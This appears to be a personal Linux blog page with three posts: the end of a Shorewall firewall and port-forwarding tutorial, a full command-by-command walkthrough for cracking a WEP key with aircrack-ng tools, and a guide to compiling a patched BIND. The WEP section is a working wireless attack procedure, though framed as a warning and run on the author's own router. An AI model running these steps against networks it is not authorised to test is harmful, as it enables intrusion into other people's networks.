# For information on the settings in this file, type “man shorewall-rules”
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP net:1.2.3.4 all
DROP net:2.0.0.0/24 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 –
ACCEPT net fw tcp 5000:5250 –
ACCEPT net fw tcp 50505 –
DNAT wan net:192.168.0.100 tcp 4000 – 192.168.1.50
DNAT wan net:192.168.0.100 udp 4000 – 192.168.1.50
DNAT wan net:192.168.0.100:6112 tcp 6118 – 192.168.1.50
DNAT wan net:192.168.0.100:6112 udp 6118 – 192.168.1.50
#LAST LINE — DO NOT REMOVE

save the file and restart firewall as You did before. Make sure that the port 6112 (both TPC and UDP) is open on the 192.168.0.100 machine. How?

su -c "nmap -Pn -p 6112 192.168.0.100 && nmap -sU -Pn -p 6112 192.168.0.100"

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up (0.00012s latency).
PORT STATE SERVICE
6112/tcp open dtspc

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up.
PORT STATE SERVICE
6112/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds

That’s it – You have just configured shorewall to Your liking.

Hint: Think of a firewall as of a naughty kid – if You will allow him to do something and then deny it – You know he will still do it… In other words the order of the rules / policies does matters. Deny first and ask questions later ;).

Hint: IF You are forwarding the port from machine 1 to machine 2 there is no need to open the port on the machine 1. DNAT rule will take care of that for You. You need to however make sure that the port is open on the machine 2. IF its not – check if the application that was suppose to open the port is running and IF You are running shorewall on the machine 2 as well make sure that the appropriate rule was added in the the machine 2 shorewall rule file.

Hint: Do not scan the ports from the same machine that You have configured firewall on – it will be considered as a local scan and firewall will not block ports.

Hint: IF You will run into a problem during the setup and firewall won’t start or restart use this command:

journalctl -xn

and read it’s output thoroughly. The answer to Your trouble is there.

Hint: If You want to test if shorewall is causing You trouble (blocks some port that You want to connect to) run:

systemctl stop shorewall && shorewall clear

This will stop the firewall and clear all it’s rules. IF after You did this You still cannot connect to the port on Your machine and it says its filtered or closed – look for a reason somewhere else…

Regards.

Andrzej

P.S. Breaking news… Someone actually reads this… This post has been translated (not very exactly I must say) to Polish by Wilczek. You can find it here.

Cracking WEP by AndrzejL aka one of the reasons why You SHOULD NEVER USE WEP TO SECURE YOUR ROUTER!

I have noticed (while connecting to my own AP) that many people around still use WEP encryption and I just felt dizzy… After I have counted to 10 I have decided to write this up:

Cracking WEP by AndrzejL aka one of the reasons why You SHOULD NEVER USE WEP to secure Your router!

This is NOT a “HOW TO CRACK WEP” tutorial. This is a warning. Warning that should be taken as “WOW! This WEP stuff is really not secure… I better change my router to personal WPA2 right away…”. Please do not use this knowledge to do illegal stuff. I used my own wireless router in my own wireless network for this demonstration. Breaking into WEP secured networks is illegal. You have been warned.

0) Install aircrack-ng-svn from ArchLinux AUR repository:

FIRST WINDOW:

1) Check the name of the wireless interface

iwconfig

says it’s wlan0

2) Check mac address of wlan0

ifconfig wlan0

says YY:YY:YY:YY:YY:YY

3) Optional – not necessary under Backtrack. Kill unnecessary network services that can mess You up:

airmon-ng check kill

Example:

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
23899   ifplugd
Killing all those processes…

4) Create wireless interface in monitor mode:

airmon-ng start wlan0

5) Check the name of the wireless monitor mode interface

iwconfig

says it’s mon0

6) Start sniffing to collect router’s data

airodump-ng mon0

Stop airodump with CTRL + C

Information gathered:

Router’s BSSID: XX:XX:XX:XX:XX:XX
Router’s ESSID: Arch_Linux_User

    INFO: If ESSID contains spaces put it in the “” or ‘ ‘ in next commands ie “Arch Linux User” or ‘Arch Linux User’.

Router’s CHANNEL: ZZ

7) Kill mon0 interface:

airmon-ng stop mon0

8) Start mon0 fixed at the AP’s channel:

airmon-ng start wlan0 ZZ

9) Now re-write Your sniffing command so it sniffs the right channel / bssid and so it saves the captured packets into a file:

airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX -w ./output mon0

    IF You get “Fixed channel mon0: -1” in the right hand corner of the sniffer – then rewrite Your command again by adding –ignore-negative-one so it looks like this:

airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX  --ignore-negative-one -w ./output mon0

    Leave this command running and saving packets.

SECOND WINDOW:

10) Check if the card is capable of packet injection:

aireplay-ng -9 mon0

    16:10:47  Injection is working!

11) Try to auth with router:

aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0

    if You get this error:

16:20:36 Waiting for beacon frame (XX:XX:XX:XX:XX:XX) on channel -1
15:38:33  Couldn’t determine current channel for mon0, you should either force the operation with –ignore-negative-one or apply a kernel patch.

    just rewrite Your command by adding “–ignore-negative-one” switch.

Example:

aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

This command will (should) auth You with a router and then give You the prompt back.

0 – this can take a value between 0 and 512 (experiment)
-e router’s ESSID
-a router’s BSSID
-h Your card’s MAC address
–ignore-negative-one fixes the above mentioned error

IF You want to stop this command use CTRL + C

16:16:28  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1

16:16:28  Sending Authentication Request (Open System) [ACK]
16:16:28  Authentication successful
16:16:28  Sending Association Request [ACK]
16:16:28  Association successful 🙂 (AID: 1)

🙂 now fiddle with the “0” in the command – change it’s values to something between 1 and 512.

Example:

aireplay-ng -1 1 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

    Leave this command running.

THIRD WINDOW:

12) Start to inject:

aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0

    If You get these errors:

16:21:36  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1
16:21:36  Couldn’t determine current channel for mon0, you should either force the operation with –ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).

    rewrite the command by adding “-e Arch_Linux_User” and “–ignore-negative-one” switches.

Example:

aireplay-ng -3 -e Arch_Linux_User -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

Meanwhile You can (but You do not have to) fiddle with the airmon-ng “-1” command in the second window. Change the value of “0” to different values between 1 and 512 – see which is better for You… Sometimes 1 will do juuuust fine.

    After a while You _should_ receive ARP request packet… and… START TO INJECT THEM.

FOURTH WINDOW:

13) When collected some ARP packets You can start the cracking process:

aircrack-ng -z ./output*.cap

and soon after that You should be able to see this sort of message:

KEY FOUND! [ 2C:BD:3D:AC:D5:97:59:57:28:CE:3C:B9:F5 ]
Decrypted correctly: 100%

That’s it… You’re all done…

It takes less then 5 minutes to crack WEP key… 5 minutes guys and girls… and Your wireless network has been compromised… Now please tell me that You have changed the default administrator’s password for the router? Please please tell me You did at least that…

Cheers.

AndrzejL

[PCLinuxOS] Manually upgrading Bind / Named to version 9.9.2-P2 [Security patches].

Hi folks.

Latest Bind / Named version was released several days ago to patch this vulnerability.

I will try to show how to download, extract, configure and install the latest version.

Open terminal window and follow this set of instructions:

su

root's password

export PREFIX=`echo /usr/`

export PATH=$PREFIX/bin:$PATH

export PKG_CONFIG_PATH=$PREFIX/lib/pkgconfig:$PREFIX/share/pkgconfig

cd /opt/

mkdir Bind

cd Bind

wget -c ftp://ftp.isc.org/isc/bind9/9.9.2-P2/bind-9.9.2-P2.tar.gz

tar xvzf ./bind-9.9.2-P2.tar.gz

cd bind-9.9.2-P2

./configure --prefix=$PREFIX --sysconfdir=/etc/

You can expect missing dependencies here. I had no problems whatsoever as I have a good few “devel” packages installed – try figuring out what You’re missing if You do run into a snag, then install it from Synaptic (without closing this window) and re-run the above configure step till there are no errors.

make

make install

ls --full /var/lib/named/var/

one of the listed items should look like this:

drwxr-xr-x 7 root root 4096 2013-03-22 09:08:02.163308440 +0100 named/

ls --full /var/lib/named/var/named

chown named:named /var/lib/named/var/named/

drwxr-xr-x 7 named named 4096 2013-03-22 09:08:08.221303100 +0100 named/

Now in this terminal window type in

named -v

the reply should look like this:

BIND 9.9.2-P2

service named restart

and the reply should look something like this:

Stopping named: [ Failed ]
Starting named: [ OK ]

This should be it… You have compiled and are running latest patched version of Bind…

Regards.

Andy